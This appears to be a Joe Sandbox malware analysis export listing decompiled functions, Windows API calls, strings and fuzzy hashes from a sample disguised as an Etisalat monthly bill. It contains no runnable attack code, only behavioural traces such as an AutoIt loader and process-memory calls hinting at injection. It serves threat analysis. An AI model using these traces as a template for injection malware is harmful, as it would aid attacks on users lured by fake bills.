Instruction ID: 9c79c063707db302606e37c81796f064f865f78e90316edd0c2ed1fef4e0f229
Opcode Fuzzy Hash: 70d8b7aa022572c5609a87034d2fea8c3219b57b5380ba09a7f29e399a658880
Instruction Fuzzy Hash: D9B12D71A0011DABDF11EBA4CC85EDEB7BDFF49350F1040AAF609E6151EA34DA948FA1

Function 008A3B1C Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,?,?,80000001,80000001,?,008A3B0F,SwapMouseButtons,00000004,?), ref: 008A3B40
RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,80000001,80000001,?,008A3B0F,SwapMouseButtons,00000004,?), ref: 008A3B61
RegCloseKey.KERNELBASE(00000000,?,?,?,80000001,80000001,?,008A3B0F,SwapMouseButtons,00000004,?), ref: 008A3B83

Strings

Control Panel\Mouse, xrefs: 008A3B3E

Memory Dump Source

Source File: 00000000.00000002.2024011930.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.2023992610.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.000000000093C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.0000000000962000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024155820.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024176129.0000000000974000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_Etisalat Summary Bill for the Month of August.jbxd

Similarity

API ID: CloseOpenQueryValue
String ID: Control Panel\Mouse
API String ID: 3677997916-824357125
Opcode ID: c3753dc48b0237132d0c6786f33efa689e36a1ce504f6a23f1b43fc2fbf49cc5
Instruction ID: 579bdf0caaaaf684088d53217d414835a44c24a6ea969d6221412de810c87f3c
Opcode Fuzzy Hash: c3753dc48b0237132d0c6786f33efa689e36a1ce504f6a23f1b43fc2fbf49cc5
Instruction Fuzzy Hash: C6112AB5521608FFEB208FA5DC85AAEB7B9FF06754B104459F805E7110D3319E41AB60

Function 01F412A0 Relevance: 6.7, APIs: 4, Instructions: 720processthreadCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNELBASE(?,00000000), ref: 01F41A5B
Wow64GetThreadContext.KERNEL32(?,00010007), ref: 01F41AF1
ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 01F41B13

Memory Dump Source

Source File: 00000000.00000002.2025586288.0000000001F40000.00000040.00001000.00020000.00000000.sdmp, Offset: 01F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f40000_Etisalat Summary Bill for the Month of August.jbxd

Similarity

API ID: Process$ContextCreateMemoryReadThreadWow64
String ID:
API String ID: 2438371351-0
Opcode ID: e235fc09ec9bfc9c0206b74767dc68ebb1ba0de80392d7b4ec5f78f608a2290d
Instruction ID: 7d331fa2f70fbc49d8be354a93375e44d65bb797645a7769bf325514129206f9
Opcode Fuzzy Hash: e235fc09ec9bfc9c0206b74767dc68ebb1ba0de80392d7b4ec5f78f608a2290d
Instruction Fuzzy Hash: BC620D34A14658DBEB24CFA4C850BDEB772EF58300F1091A9D20DEB390E7769E81CB59

Function 008ADFD0 Relevance: 6.7, APIs: 2, Strings: 1, Instructions: 1414COMMON

Download Yara Rule

Strings

Variable must be of type 'Object'., xrefs: 008F32B7

Memory Dump Source

Source File: 00000000.00000002.2024011930.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.2023992610.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.000000000093C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.0000000000962000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024155820.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024176129.0000000000974000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_Etisalat Summary Bill for the Month of August.jbxd

Similarity

API ID:
String ID: Variable must be of type 'Object'.
API String ID: 0-109567571
Opcode ID: d8ce95d859c55b8ac707c8d833429aadef3c11dec1102a3e87a243e89fc6553a
Instruction ID: 31f04d30764634e2e56ccda0a5db07c713ed3c2d2647723be92ecb063484384c
Opcode Fuzzy Hash: d8ce95d859c55b8ac707c8d833429aadef3c11dec1102a3e87a243e89fc6553a
Instruction Fuzzy Hash: 06C2BE71A00219CFEB24CF68C880AADB7B1FF5A314F248969EA05EB791D375ED41CB51

Function 008A3923 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 94windowCOMMON

Download Yara Rule

APIs

LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 008E33A2

Part of subcall function 008A6B57: _wcslen.LIBCMT ref: 008A6B6A

Shell_NotifyIconW.SHELL32(00000001,?), ref: 008A3A04

Strings

Line: , xrefs: 008E33EB

Memory Dump Source

Source File: 00000000.00000002.2024011930.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.2023992610.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.000000000093C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.0000000000962000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024155820.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024176129.0000000000974000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_Etisalat Summary Bill for the Month of August.jbxd

Similarity

API ID: IconLoadNotifyShell_String_wcslen
String ID: Line:
API String ID: 2289894680-1585850449
Opcode ID: c873219c4dea24949c5eda1c452fa97540104fb1fd1e9a66b08cc053deb0ee7c
Instruction ID: 69bcef50f29e4522d7c7c450f7385a56b9b8f54841ccc391a17a30bfc3fdb0fd
Opcode Fuzzy Hash: c873219c4dea24949c5eda1c452fa97540104fb1fd1e9a66b08cc053deb0ee7c
Instruction Fuzzy Hash: 3131D271418314ABE725EB28DC46BDBB7E8FB42314F04452AF599D3591EB709A48C7C3

Function 008BFDDB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43COMMON

Download Yara Rule

APIs

__CxxThrowException@8.LIBVCRUNTIME ref: 008C0668

Part of subcall function 008C32A4: RaiseException.KERNEL32(?,?,?,008C068A,?,00971444,?,?,?,?,?,?,008C068A,008A1129,00968738,008A1129), ref: 008C3304

__CxxThrowException@8.LIBVCRUNTIME ref: 008C0685

Strings

Unknown exception, xrefs: 008C0692

Memory Dump Source

Source File: 00000000.00000002.2024011930.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.2023992610.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.000000000093C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.0000000000962000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024155820.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024176129.0000000000974000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_Etisalat Summary Bill for the Month of August.jbxd

Similarity

API ID: Exception@8Throw$ExceptionRaise
String ID: Unknown exception
API String ID: 3476068407-410509341
Opcode ID: 5b4ac2e183090ebd65e39e7856bffd1fc59b6e47cc7c83fd983ab712e18725b2
Instruction ID: b9fe535d71caac1e1912a609bf7b77cfc4528359641730693f5781d2a351ed9f
Opcode Fuzzy Hash: 5b4ac2e183090ebd65e39e7856bffd1fc59b6e47cc7c83fd983ab712e18725b2
Instruction Fuzzy Hash: 4AF0C83490030DB78F00BAA8DC46E9E777CFE50354B608539B924D5592EF71DB56CD82

Function 00913017 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 18COMMON

Download Yara Rule

APIs

GetTempPathW.KERNEL32(00000104,?,00000001), ref: 0091302F
GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 00913044

Strings

aut, xrefs: 00913038

Memory Dump Source

Source File: 00000000.00000002.2024011930.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.2023992610.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.000000000093C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.0000000000962000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024155820.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024176129.0000000000974000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_Etisalat Summary Bill for the Month of August.jbxd

Similarity

API ID: Temp$FileNamePath
String ID: aut
API String ID: 3285503233-3010740371
Opcode ID: 840704b63688cbe6611b419dcd9de26a36a73c3bf031082a2d206122b8b15e4a
Instruction ID: d78dbda188d22da1f27fa6e79b74d7428df5184ae23da52094efeaf441340d92
Opcode Fuzzy Hash: 840704b63688cbe6611b419dcd9de26a36a73c3bf031082a2d206122b8b15e4a
Instruction Fuzzy Hash: D2D05EB250032877DA20A7A4AC0EFCB3A6CDB04750F4002A1BA65E2095DAB0D984CFD0

Function 00927F59 Relevance: 4.9, APIs: 3, Instructions: 430COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000000,00000067,000000FF,?,?,?), ref: 009282F5
TerminateProcess.KERNEL32(00000000), ref: 009282FC
FreeLibrary.KERNEL32(?,?,?,?), ref: 009284DD

Memory Dump Source

Source File: 00000000.00000002.2024011930.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.2023992610.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.000000000093C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.0000000000962000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024155820.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024176129.0000000000974000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_Etisalat Summary Bill for the Month of August.jbxd

Similarity

API ID: Process$CurrentFreeLibraryTerminate
String ID:
API String ID: 146820519-0
Opcode ID: 7e77843012990a18913801e525128a69f248ec6882da41a2c5a06c53bbcb72e9
Instruction ID: 9890d1292246e5a7c724f4512e840757b079f5ac94ec1e1af3935b8eab97051f
Opcode Fuzzy Hash: 7e77843012990a18913801e525128a69f248ec6882da41a2c5a06c53bbcb72e9
Instruction Fuzzy Hash: DE128971A083119FD724DF28D484B6ABBE5FF89318F04895DE8998B356CB30E945CF92

Function 008D5AA9 Relevance: 4.7, APIs: 3, Instructions: 186COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2024011930.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.2023992610.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.000000000093C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.0000000000962000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024155820.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024176129.0000000000974000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_Etisalat Summary Bill for the Month of August.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 81616f76ea923d8a557db4721a53f8974fff0d23e5bcc8ae113f8380aa645846
Instruction ID: b958ffc891aafbcab5d87d98ba8a7705513d382aabccc324655867b0ea448a03
Opcode Fuzzy Hash: 81616f76ea923d8a557db4721a53f8974fff0d23e5bcc8ae113f8380aa645846
Instruction Fuzzy Hash: 2051BE71910A09AFDB209FA9C845FAEBBB8FF45324F14025BF405E7392D7719A01DB62

Function 008A10F3 Relevance: 4.7, APIs: 3, Instructions: 153comCOMMON

Download Yara Rule

APIs

Part of subcall function 008A1BC3: MapVirtualKeyW.USER32(0000005B,00000000), ref: 008A1BF4
Part of subcall function 008A1BC3: MapVirtualKeyW.USER32(00000010,00000000), ref: 008A1BFC
Part of subcall function 008A1BC3: MapVirtualKeyW.USER32(000000A0,00000000), ref: 008A1C07
Part of subcall function 008A1BC3: MapVirtualKeyW.USER32(000000A1,00000000), ref: 008A1C12
Part of subcall function 008A1BC3: MapVirtualKeyW.USER32(00000011,00000000), ref: 008A1C1A
Part of subcall function 008A1BC3: MapVirtualKeyW.USER32(00000012,00000000), ref: 008A1C22

Part of subcall function 008A1B4A: RegisterWindowMessageW.USER32(00000004,?,008A12C4), ref: 008A1BA2

GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 008A136A
OleInitialize.OLE32 ref: 008A1388
CloseHandle.KERNEL32(00000000,00000000), ref: 008E24AB

Memory Dump Source

Source File: 00000000.00000002.2024011930.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.2023992610.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.000000000093C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.0000000000962000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024155820.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024176129.0000000000974000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_Etisalat Summary Bill for the Month of August.jbxd

Similarity

API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
String ID:
API String ID: 1986988660-0
Opcode ID: 4b174d45a07a8f38bc7078f5c3fa9b01ad47b1c056a3a8279779a52ad2e506e7
Instruction ID: 8a2408c5e16636e1b5e5bc675ceae59d821c7595fc7762e6141e7f535f27b7ea
Opcode Fuzzy Hash: 4b174d45a07a8f38bc7078f5c3fa9b01ad47b1c056a3a8279779a52ad2e506e7
Instruction Fuzzy Hash: CA71ACB69393008FD798EF7DA8466953AE4FB89344B54822AE01ED7371EB304480EF56

Function 008A54C6 Relevance: 4.6, APIs: 3, Instructions: 103COMMON

Download Yara Rule

APIs

SetFilePointerEx.KERNELBASE(?,?,00000001,00000000,00000001,?,00000000), ref: 008A556D
SetFilePointerEx.KERNELBASE(?,00000000,00000000,?,00000001), ref: 008A557D

Memory Dump Source

Source File: 00000000.00000002.2024011930.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.2023992610.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.000000000093C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.0000000000962000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024155820.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024176129.0000000000974000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_Etisalat Summary Bill for the Month of August.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: 66545f944a9ab80955ff1eada621c09faa478e22ab810126be4e311148983274
Instruction ID: efd90391c793bd6e664fd31f98cb2f63f0cd94b59a56a54efcc1a96140ee1b66
Opcode Fuzzy Hash: 66545f944a9ab80955ff1eada621c09faa478e22ab810126be4e311148983274
Instruction Fuzzy Hash: 6C316C71A00A09EFEB14CF68C880B99B7B6FB49314F148229E919D7640D771FE94CB90

Function 008D86AE Relevance: 4.6, APIs: 3, Instructions: 61COMMONLIBRARYCODE

Download Yara Rule

APIs

FindCloseChangeNotification.KERNELBASE(00000000,00000000,?,?,008D85CC,?,00968CC8,0000000C), ref: 008D8704
GetLastError.KERNEL32(?,008D85CC,?,00968CC8,0000000C), ref: 008D870E
__dosmaperr.LIBCMT ref: 008D8739

Memory Dump Source

Source File: 00000000.00000002.2024011930.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.2023992610.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.000000000093C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.0000000000962000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024155820.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024176129.0000000000974000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_Etisalat Summary Bill for the Month of August.jbxd

Similarity

API ID: ChangeCloseErrorFindLastNotification__dosmaperr
String ID:
API String ID: 490808831-0
Opcode ID: 1a1531efdc65dd1700282605a2be001a555168059d1fc0cbcdbfb36e67e9d4cf
Instruction ID: cdba69dce46b2230a4eb971465d7bfa23ce833e9ab027b0326929b3a48b4e481
Opcode Fuzzy Hash: 1a1531efdc65dd1700282605a2be001a555168059d1fc0cbcdbfb36e67e9d4cf
Instruction Fuzzy Hash: 8A012F33605560A6D62876387849B7E6B45FB92774F35031BF814DB3D2DE60CC819151

Function 00912FD8 Relevance: 4.5, APIs: 3, Instructions: 27filetimeCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,00000000,?,?,00912CD4,?,?,?,00000004,00000001), ref: 00912FF2
SetFileTime.KERNELBASE(00000000,?,00000000,?,?,00912CD4,?,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00913006
CloseHandle.KERNEL32(00000000,?,00912CD4,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 0091300D

Memory Dump Source

Source File: 00000000.00000002.2024011930.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.2023992610.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.000000000093C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.0000000000962000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024155820.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024176129.0000000000974000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_Etisalat Summary Bill for the Month of August.jbxd

Similarity

API ID: File$CloseCreateHandleTime
String ID:
API String ID: 3397143404-0
Opcode ID: d2e78654d2b9f00b0ff7446e327f79abf349e30476d2fac0eec97229a8b550d4
Instruction ID: 313008bde825503e8112885a651733e6b679aeb9179b86caeda4f43aa9c5e43e
Opcode Fuzzy Hash: d2e78654d2b9f00b0ff7446e327f79abf349e30476d2fac0eec97229a8b550d4
Instruction Fuzzy Hash: 4FE0867229461477D2301755BC0DFCB3A5CD78AB71F104210F719751D046A0650167A8

Function 008B1310 Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 531COMMON

Download Yara Rule

APIs

__Init_thread_footer.LIBCMT ref: 008B17F6

Strings

CALL, xrefs: 008B17C6

Memory Dump Source

Source File: 00000000.00000002.2024011930.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.2023992610.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.000000000093C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.0000000000962000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024155820.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024176129.0000000000974000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_Etisalat Summary Bill for the Month of August.jbxd

Similarity

API ID: Init_thread_footer
String ID: CALL
API String ID: 1385522511-4196123274
Opcode ID: ff03af1249a807ff5f23670c4c3698ddd4da52959f4a16f680a39c4705b1e3cc
Instruction ID: d1869057e4c948fb0fe891bb662fcf828880027f7e3602bbd29cad4ea17a3250
Opcode Fuzzy Hash: ff03af1249a807ff5f23670c4c3698ddd4da52959f4a16f680a39c4705b1e3cc
Instruction Fuzzy Hash: 33228B706082059FCB24DF28C498A6ABBF1FF89314F54892DF596CB362D731E855CB92

Function 00916EF1 Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 297COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00916F6B

Part of subcall function 008A4ECB: LoadLibraryExW.KERNELBASE(?,00000000,00000002,?,00971418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 008A4EFD

Strings

>>>AUTOIT SCRIPT<<<, xrefs: 00916F5A, 00916F63

Memory Dump Source

Source File: 00000000.00000002.2024011930.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.2023992610.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.000000000093C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.0000000000962000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024155820.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024176129.0000000000974000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_Etisalat Summary Bill for the Month of August.jbxd

Similarity

API ID: LibraryLoad_wcslen
String ID: >>>AUTOIT SCRIPT<<<
API String ID: 3312870042-2806939583
Opcode ID: 638a8e862efbd9fe4bb7d068d832ae863bfe7c3cd696727b04364768cf3ae959
Instruction ID: 960a1938595a260654c106a1cdb2506d8f5e527cdcab20b210ac38c6ec1ab342
Opcode Fuzzy Hash: 638a8e862efbd9fe4bb7d068d832ae863bfe7c3cd696727b04364768cf3ae959
Instruction Fuzzy Hash: A4B193316082058FDB14EF64C4919AEB7E5FF95310F04881DF496C76A1EB30ED89CB92

Function 008A2DE3 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 64COMMON

Download Yara Rule

APIs

GetOpenFileNameW.COMDLG32(?), ref: 008E2C8C

Part of subcall function 008A3AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,008A3A97,?,?,008A2E7F,?,?,?,00000000), ref: 008A3AC2

Part of subcall function 008A2DA5: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 008A2DC4

Strings

X, xrefs: 008E2C5A

Memory Dump Source

Source File: 00000000.00000002.2024011930.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.2023992610.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.000000000093C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.0000000000962000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024155820.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024176129.0000000000974000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_Etisalat Summary Bill for the Month of August.jbxd

Similarity

API ID: Name$Path$FileFullLongOpen
String ID: X
API String ID: 779396738-3081909835
Opcode ID: aefb170aeaa8ec84cf02968e8ea80604dfa930c4e3270432cd1e9fad9328fd1e
Instruction ID: d589f4e5a562390aa10204a87ae65bb1198e3c1958da32c877f0b70dba777273
Opcode Fuzzy Hash: aefb170aeaa8ec84cf02968e8ea80604dfa930c4e3270432cd1e9fad9328fd1e
Instruction Fuzzy Hash: 13218171A102989BDB159F98C845BEE7BFCFF4A314F004059E405E7241DBB89A89CBA2

Function 00912557 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 50COMMON

Download Yara Rule

APIs

__fread_nolock.LIBCMT ref: 00912587

Strings

EA06, xrefs: 009125B9

Memory Dump Source

Source File: 00000000.00000002.2024011930.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.2023992610.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.000000000093C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.0000000000962000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024155820.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024176129.0000000000974000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_Etisalat Summary Bill for the Month of August.jbxd

Similarity

API ID: __fread_nolock
String ID: EA06
API String ID: 2638373210-3962188686
Opcode ID: 09a3961bf2adc3093adcbb8bb90635350dccb4b21ad24c8cc808c20dd4a8a2e9
Instruction ID: 53c80fb84b69ac1e1482a437c0ed20fa25d7992d97b25845b9e7e2f2fd147cdc
Opcode Fuzzy Hash: 09a3961bf2adc3093adcbb8bb90635350dccb4b21ad24c8cc808c20dd4a8a2e9
Instruction Fuzzy Hash: 7F01B5729442587EDF28D7A8C856FEEBBF8DB05305F00455EF152D2181E5B4E6188B60

Function 008A3837 Relevance: 3.1, APIs: 2, Instructions: 77windowCOMMON

Download Yara Rule

APIs

Shell_NotifyIconW.SHELL32(00000000,?), ref: 008A3908

Memory Dump Source

Source File: 00000000.00000002.2024011930.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.2023992610.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.000000000093C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.0000000000962000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024155820.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024176129.0000000000974000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_Etisalat Summary Bill for the Month of August.jbxd

Similarity

API ID: IconNotifyShell_
String ID:
API String ID: 1144537725-0
Opcode ID: 3656d089a219acc5477cbeafc7c3c1eeb357df28a5eea98a0b365dfd2993af61
Instruction ID: 3ab8742334ed6afdeddf792d24919d079a0cf991e8195eaaac720cef5b0e140d
Opcode Fuzzy Hash: 3656d089a219acc5477cbeafc7c3c1eeb357df28a5eea98a0b365dfd2993af61
Instruction Fuzzy Hash: B33193B1508701DFE720DF28D885797BBE8FB4A708F00092EF599D3650E775AA44DB52

Function 008A5745 Relevance: 3.1, APIs: 2, Instructions: 56fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,008A949C,?,00008000), ref: 008A5773
CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,?,?,?,008A949C,?,00008000), ref: 008E4052

Memory Dump Source

Source File: 00000000.00000002.2024011930.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.2023992610.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.000000000093C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.0000000000962000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024155820.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024176129.0000000000974000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_Etisalat Summary Bill for the Month of August.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 2e66c37908fa75f9bce34971be4878c641e514778a81876822eed89e1f897502
Instruction ID: 59c01d7f44fd50bdc0822264ac7eb94665549f206080b6e8302d1ee2a44be026
Opcode Fuzzy Hash: 2e66c37908fa75f9bce34971be4878c641e514778a81876822eed89e1f897502
Instruction Fuzzy Hash: 5E019230145625B6E3310A6ACC0EF977F98EF03BB4F108310BA9CAA1E0C7B45894DB90

